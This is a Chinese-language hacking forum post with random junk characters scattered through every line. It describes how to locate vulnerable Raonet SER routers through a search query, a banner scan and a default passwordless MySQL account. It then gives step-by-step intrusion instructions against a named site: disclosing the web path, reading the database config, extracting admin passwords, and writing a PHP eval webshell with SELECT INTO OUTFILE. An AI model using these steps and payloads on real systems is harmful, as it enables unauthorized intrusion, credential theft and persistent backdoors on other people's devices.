寻找存在漏洞的路由器方法:! p% q, p% A3 n* q. h" a
; P* ?& [( c J9 Z1 a8 L4 m
1:google搜索'Raonet Subscriber Ethernet Router'. M0 x4 ^ W% H7 b
8 W. \' Z. g" y5 H2 w/ x
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
3 C, _" Y* v( n l& P
) O- @) \: O6 w/ S/ `- J3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。( h$ k9 C1 S I7 a' x0 u
( L$ x! r, `2 f! s) @$ M//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
9 m4 e) u# W/ O! T5 E# C4 z8 L8 C& K& d5 K
( c0 B1 I$ D/ I! H/ A, E. c* X, M& n4 F. p; N5 ^
入侵步骤:1 y# E( f' M1 m* M
0 {8 Y6 N$ w3 h4 i! s( j M
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; [% Y. U; b4 \( p- l
4 p; Y& o1 e9 Z0 ~
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
# H, V% I' h5 j6 W" H. K3:得到密码后连接,查看GUI管理密码:
& Z* ]1 q4 N2 s9 t+ Quse ser_5001 z5 t" v0 d: R* }- k; r( \, A
select id,passwd from user; R' i6 e: e& f0 Z+ b
4:通过数据库写入webshell,执行命令:2 p" @) y+ v; J" N- F1 Y
use mysql;
" H/ m3 M3 d8 v. ucreate table ok(cmd TEXT);
% d/ k% Q P. R- _0 x5 b2 Finsert into ok values("<?php @eval($_POST[cmd])?>");, _7 q% k" u% f, |! d
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 ?8 I2 Y B5 v1 T9 P5 q4 g2 h$ a8 y
drop table ok;- p9 T- I' F ~; _
$ o1 m2 _0 S* J8 k6 h5 x4 t
5:连接后门shell.php / d8 \# z {+ y
2 j+ ^+ j/ s+ W! q+ M! w6. 搞定!3 Q2 |3 g, K. B# n& L
! L+ j# h3 q1 ~* @9 E# s, ~- }
|